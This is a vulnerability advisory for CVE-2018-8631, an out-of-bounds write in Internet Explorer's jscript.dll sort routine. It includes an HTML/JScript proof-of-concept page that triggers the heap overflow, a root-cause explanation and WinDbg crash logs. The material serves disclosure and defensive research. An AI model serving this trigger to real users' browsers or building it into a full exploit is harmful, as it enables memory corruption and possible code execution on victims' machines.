Microsoft Windows jscript!JsArrayFunctionHeapSort Out-Of-Bounds Write

`Windows: out-of-bounds write in jscript!JsArrayFunctionHeapSort   
  
CVE-2018-8631  
  
  
There is an out-of-bounds write vulnerability in jscript.dll in JsArrayFunctionHeapSort function. This vulnerability can be exploited through Internet Explorer or potentially through WPAD over local network.   
  
PoC:  
=========================================================  
  
<!-- saved from url=(0014)about:internet -->  
<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>  
<script language="Jscript.Encode">  
  
function f0() { }  
  
function f1() {  
f2.prototype = arguments;  
new f2();  
}  
  
function f2() {  
Array.prototype.sort.call(this, f0);  
}  
  
f1(1, 2, 3);  
  
</script>  
  
=========================================================  
  
Details:  
  
JsArrayFunctionHeapSort is called when sorting an array with a provided comparison function. One of its arguments is the number of elements in the input array/object. The function then allocates a temporary array of the this size, copies all properties of the input array/object into it (where property name is numeric and smaller than the "length" property of the input object) and proceeds to sort the temporary array. Normally, the allocated array is sufficient to store all the properties to be sorted. However, in the case of the attached PoC, where the sorted object prototype is the arguments object, when calculating the number of elements, the number of elements in the arguments object aren't taken into account, which leads to an overflow.  
  
  
Debug Log:  
=========================================================  
  
(1d50.1d80): Access violation - code c0000005 (first chance)  
First chance exceptions are reported before any exception handling.  
This exception may be expected and handled.  
eax=c0c00003 ebx=07512fc0 ecx=0d1e3008 edx=074faf50 esi=0c3c6f30 edi=07512fc0  
eip=6d53a09e esp=096daa44 ebp=096daa6c iopl=0 nv up ei pl zr na pe nc  
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246  
jscript!NameTbl::GetValCore+0x54915:  
6d53a09e 8901 mov dword ptr [ecx],eax ds:002b:0d1e3008=????????  
  
0:007> k  
# ChildEBP RetAddr   
00 096daa6c 6d4e5775 jscript!NameTbl::GetValCore+0x54915  
01 096daa8c 6d4e66b1 jscript!NameTbl::GetValById+0x5f  
02 096daad4 6d551f30 jscript!NameTbl::GetVal+0x112  
03 096dab34 6d51d6ae jscript!NameTbl::GetVal+0x50  
04 096dac14 6d51d595 jscript!JsArrayFunctionHeapSort+0xe2  
05 096dac8c 6d4e7850 jscript!JsArraySort+0x1ed  
06 096dacf4 6d4e7730 jscript!NatFncObj::Call+0xe8  
07 096dad84 6d53ab8f jscript!NameTbl::InvokeInternal+0x2cb  
08 096dadbc 6d5432dd jscript!VAR::InvokeByDispID+0x56357  
09 096dae0c 6d4e7850 jscript!JsFncCall+0xbd  
0a 096dae74 6d4e7730 jscript!NatFncObj::Call+0xe8  
0b 096daf04 6d4e657c jscript!NameTbl::InvokeInternal+0x2cb  
0c 096daff8 6d4e74c1 jscript!VAR::InvokeByName+0x1b9  
0d 096db044 6d53ab21 jscript!VAR::InvokeDispName+0x3e  
0e 096db074 6d4e4813 jscript!VAR::InvokeByDispID+0x562e9  
0f 096db45c 6d4e3f7f jscript!CScriptRuntime::Run+0x129e  
10 096db558 6d4e3e03 jscript!ScrFncObj::CallWithFrameOnStack+0x15f  
11 096db5b0 6d5003bb jscript!ScrFncObj::Call+0x7b  
12 096db63c 6d4eec30 jscript!ScrFncObj::Construct+0xeb  
13 096db6c4 6d53ab8f jscript!NameTbl::InvokeInternal+0x338  
14 096db6f8 6d4eeca4 jscript!VAR::InvokeByDispID+0x56357  
15 096dbae0 6d4e3f7f jscript!CScriptRuntime::Run+0x1ff8  
16 096dbbdc 6d4e3e03 jscript!ScrFncObj::CallWithFrameOnStack+0x15f  
17 096dbc34 6d4e3d03 jscript!ScrFncObj::Call+0x7b  
18 096dbcc4 6d53ab8f jscript!NameTbl::InvokeInternal+0x2cb  
19 096dbcf8 6d4e4813 jscript!VAR::InvokeByDispID+0x56357  
1a 096dc0e0 6d4e3f7f jscript!CScriptRuntime::Run+0x129e  
1b 096dc1dc 6d4e3e03 jscript!ScrFncObj::CallWithFrameOnStack+0x15f  
1c 096dc234 6d4e4ae7 jscript!ScrFncObj::Call+0x7b  
1d 096dc2d8 6d4f32eb jscript!CSession::Execute+0x23d  
1e 096dc320 6d4f4d63 jscript!COleScript::ExecutePendingScripts+0x16b  
1f 096dc39c 6d4f4b49 jscript!COleScript::ParseScriptTextCore+0x206  
20 096dc3c8 6e5c7d14 jscript!COleScript::ParseScriptText+0x29  
21 096dc400 6e5c81eb MSHTML!CActiveScriptHolder::ParseScriptText+0x51  
22 096dc470 6e27d1d1 MSHTML!CScriptCollection::ParseScriptText+0x1c6  
23 096dc55c 6e27cd73 MSHTML!CScriptData::CommitCode+0x31e  
24 096dc5dc 6e27d90d MSHTML!CScriptData::Execute+0x232  
25 096dc5fc 6e5a4bb6 MSHTML!CHtmScriptParseCtx::Execute+0xed  
26 096dc650 6e582f12 MSHTML!CHtmParseBase::Execute+0x201  
27 096dc66c 6df9bd5f MSHTML!CHtmPost::Broadcast+0x18e  
28 096dc7a4 6e063799 MSHTML!CHtmPost::Exec+0x617  
29 096dc7c4 6e0636ff MSHTML!CHtmPost::Run+0x3d  
2a 096dc7e0 6e06aef7 MSHTML!PostManExecute+0x61  
2b 096dc7f4 6e06bce8 MSHTML!PostManResume+0x7b  
2c 096dc824 6e0524b8 MSHTML!CHtmPost::OnDwnChanCallback+0x38  
2d 096dc83c 6df4d4f3 MSHTML!CDwnChan::OnMethodCall+0x2f  
2e 096dc88c 6df4d072 MSHTML!GlobalWndOnMethodCall+0x1a1  
2f 096dc8e0 758962fa MSHTML!GlobalWndProc+0x103  
30 096dc90c 75896d3a user32!InternalCallWinProc+0x23  
31 096dc984 758977c4 user32!UserCallWinProcCheckWow+0x109  
32 096dc9e4 7589788a user32!DispatchMessageWorker+0x3b5  
33 096dc9f4 6f34ab7c user32!DispatchMessageW+0xf  
34 096dfbc0 6f3b75f8 IEFRAME!CTabWindow::_TabWindowThreadProc+0x464  
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\syswow64\iertutil.dll -   
35 096dfc80 75b46b7c IEFRAME!LCIETab_ThreadProc+0x3e7  
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Internet Explorer\IEShims.dll -   
WARNING: Stack unwind information not available. Following frames may be wrong.  
36 096dfc98 72153a31 iertutil!PrivateCoInternetCombineIUri+0x2bbc  
37 096dfcd0 7554343d IEShims!IEShims_SetRedirectRegistryForThread+0x1c1  
38 096dfcdc 77d99802 kernel32!BaseThreadInitThunk+0xe  
39 096dfd1c 77d997d5 ntdll!__RtlUserThreadStart+0x70  
3a 096dfd34 00000000 ntdll!_RtlUserThreadStart+0x1b  
  
0:007> !heap -p -a 0d1e3008  
address 0d1e3008 found in  
_DPH_HEAP_ROOT @ 7d1000  
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)  
a893bc8: d1e2fe8 18 - d1e2000 2000  
723f8e89 verifier!AVrfDebugPageHeapAllocate+0x00000229  
77e30fe6 ntdll!RtlDebugAllocateHeap+0x00000030  
77deab8e ntdll!RtlpAllocateHeap+0x000000c4  
77d93461 ntdll!RtlAllocateHeap+0x0000023a  
75ff9d45 msvcrt!malloc+0x0000008d  
6d51d645 jscript!JsArrayFunctionHeapSort+0x00000079  
6d51d595 jscript!JsArraySort+0x000001ed  
6d4e7850 jscript!NatFncObj::Call+0x000000e8  
6d4e7730 jscript!NameTbl::InvokeInternal+0x000002cb  
6d53ab8f jscript!VAR::InvokeByDispID+0x00056357  
6d5432dd jscript!JsFncCall+0x000000bd  
6d4e7850 jscript!NatFncObj::Call+0x000000e8  
6d4e7730 jscript!NameTbl::InvokeInternal+0x000002cb  
6d4e657c jscript!VAR::InvokeByName+0x000001b9  
6d4e74c1 jscript!VAR::InvokeDispName+0x0000003e  
6d53ab21 jscript!VAR::InvokeByDispID+0x000562e9  
6d4e4813 jscript!CScriptRuntime::Run+0x0000129e  
6d4e3f7f jscript!ScrFncObj::CallWithFrameOnStack+0x0000015f  
6d4e3e03 jscript!ScrFncObj::Call+0x0000007b  
6d5003bb jscript!ScrFncObj::Construct+0x000000eb  
6d4eec30 jscript!NameTbl::InvokeInternal+0x00000338  
6d53ab8f jscript!VAR::InvokeByDispID+0x00056357  
6d4eeca4 jscript!CScriptRuntime::Run+0x00001ff8  
6d4e3f7f jscript!ScrFncObj::CallWithFrameOnStack+0x0000015f  
6d4e3e03 jscript!ScrFncObj::Call+0x0000007b  
6d4e3d03 jscript!NameTbl::InvokeInternal+0x000002cb  
6d53ab8f jscript!VAR::InvokeByDispID+0x00056357  
6d4e4813 jscript!CScriptRuntime::Run+0x0000129e  
6d4e3f7f jscript!ScrFncObj::CallWithFrameOnStack+0x0000015f  
6d4e3e03 jscript!ScrFncObj::Call+0x0000007b  
6d4e4ae7 jscript!CSession::Execute+0x0000023d  
6d4f32eb jscript!COleScript::ExecutePendingScripts+0x0000016b  
  
  
This bug is subject to a 90 day disclosure deadline. After 90 days elapse  
or a patch has been made broadly available (whichever is earlier), the bug  
report will become visible to the public.  
  
  
  
  
Found by: ifratric  
  
`